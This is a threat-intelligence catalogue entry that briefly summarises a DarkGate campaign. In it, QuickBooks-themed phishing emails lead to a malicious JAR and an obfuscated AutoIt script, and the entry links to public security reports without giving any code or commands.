From Document to Script: Insides of Campaign

216.73.216.36

From Document to Script: Insides of Campaign

· Published 17/05/2024 09:38 · Modified 17/05/2024 10:03

Essential information

Published: 17/05/2024 09:38
Modified: 17/05/2024 10:03
Tags: 2024-05-17 autoit campaign cybercrime darkgate java malicious obfuscation payload phishing
Related entities: 11 observables, 1 intrusion sets (apt), 9 techniques (mitre), 1 malware

Description

This report examines a recent malicious campaign initiated via phishing emails, seemingly from 'QuickBooks,' prompting users to install Java. Clicking the embedded link leads to downloading a malicious JAR file. The JAR contains commands to fetch additional payloads, including an obfuscated AutoIt script that establishes connections with remote servers, likely for malicious purposes. The campaign employs sophisticated techniques and historical URL patterns associated with threat actors.

External references

https://www.forcepoint.com/blog/x-labs/phishing-script-inside-darkgate-campaign
https://otx.alienvault.com/pulse/6647259d5004fb78920067eb